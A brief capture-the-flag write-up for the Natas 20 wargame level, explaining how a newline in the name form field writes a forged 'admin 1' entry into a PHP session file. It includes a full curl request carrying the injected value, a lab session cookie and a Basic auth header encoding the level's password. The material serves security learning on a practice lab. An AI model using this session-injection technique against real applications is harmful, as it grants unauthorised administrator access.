# Natas 20

I figured that we might be able to inject a new line to the session file using the name parameter, after reading some hints.

However, I couldn't get the password after several times of inputting
`admin\nadmin 1` to the text field.

So I started debugging it by downloading the source code and running locally, it seems
that what's written on file is actually `name admin\nadmin 1`.

And I have to switch to using curl to make it work (new line rather than `\n`)

```bash
curl 'http://natas20.natas.labs.overthewire.org/index.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://natas20.natas.labs.overthewire.org' -H 'DNT: 1' -H 'Authorization: Basic bmF0YXMyMDpndVZhWjNFVDM1TGJnYkZNb2FONXRGY1lUMWpFUDdVSA==' -H 'Connection: keep-alive' -H 'Referer: http://natas20.natas.labs.overthewire.org/' -H 'Cookie: PHPSESSID=d23nofssab3tmfhfdrdrkfptdl' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'name=admin
admin 1'
```
